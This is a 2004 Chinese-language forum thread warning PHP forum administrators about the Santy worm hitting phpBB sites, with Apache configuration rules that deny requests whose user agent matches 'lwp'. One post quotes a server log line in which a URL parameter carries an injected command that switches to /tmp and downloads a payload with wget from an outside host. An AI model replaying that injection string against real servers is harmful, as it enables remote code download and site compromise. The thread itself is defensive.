【病毒】以 PHP 架設論壇者請注意 Net-Worm.Perl.Santy.a (apache server 擋該支蟲的方法)



贊助商連結


阿 土
2004-12-26, 11:31 PM
有一支病毒主要是攻擊 phpbb
ellery 已經發表 : 未更新 phpBB 到 2.0.11 者請注意 (http://www.pczone.com.tw/showthread.php?t=134010)

不過此病毒並非只針對 phpbb , 同樣也會嘗試攻擊 phpbb 其他論壇程式
且此病毒主要是以 Google! 搜尋資料後再前去攻擊
所有以 php 程式架設論壇的網站都會被嘗試攻擊 , 會導致網站流量異常增加

今天我也發現自己的網站流量有異常
檢視 apache server log 檔後會發現許多異常連線
"index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot....."

New computer worm attacks bulletin boards
http://www.msnbc.msn.com/id/6742668/

贊助商連結


阿 土
2004-12-26, 11:45 PM
在國外網站看到 Apache Web Server 可以用 .htaccess 來阻擋這支蟲
請把下列代碼加入 .htaccess 中即可



SetEnvIfNoCase User-Agent ".*lwp.*" spambot=1

<Limit GET POST PUT>
Order allow,deny
deny from env=spambot
allow from all
</Limit>

阿 土
2004-12-27, 12:32 AM
我自己是採用編輯 httpd.conf 在最後一行加入如下內容
PS : /usr/local/www/htdocs = 網站的網頁目錄



SetEnvIfNoCase User-Agent ".*lwp.*" bad_bot

<Directory /usr/local/www/htdocs>
Options FollowSymLinks
AllowOverride All
order allow,deny
allow from all
deny from env=bad_bot
</Directory>


然後重新啟動 apache
幾分鐘後檢查 apache 的 error_log
內容中若有如下內容表示已經檔下該支蟲
"[client 217.172.168.59] client denied by server configuration...."

kingleo
2004-12-28, 05:45 PM
有架論壇的還真的得隨時注意

luckyboys
2005-01-11, 03:23 PM
架論壇要注意
http://www.gogoboy.com.tw/mybbs.htm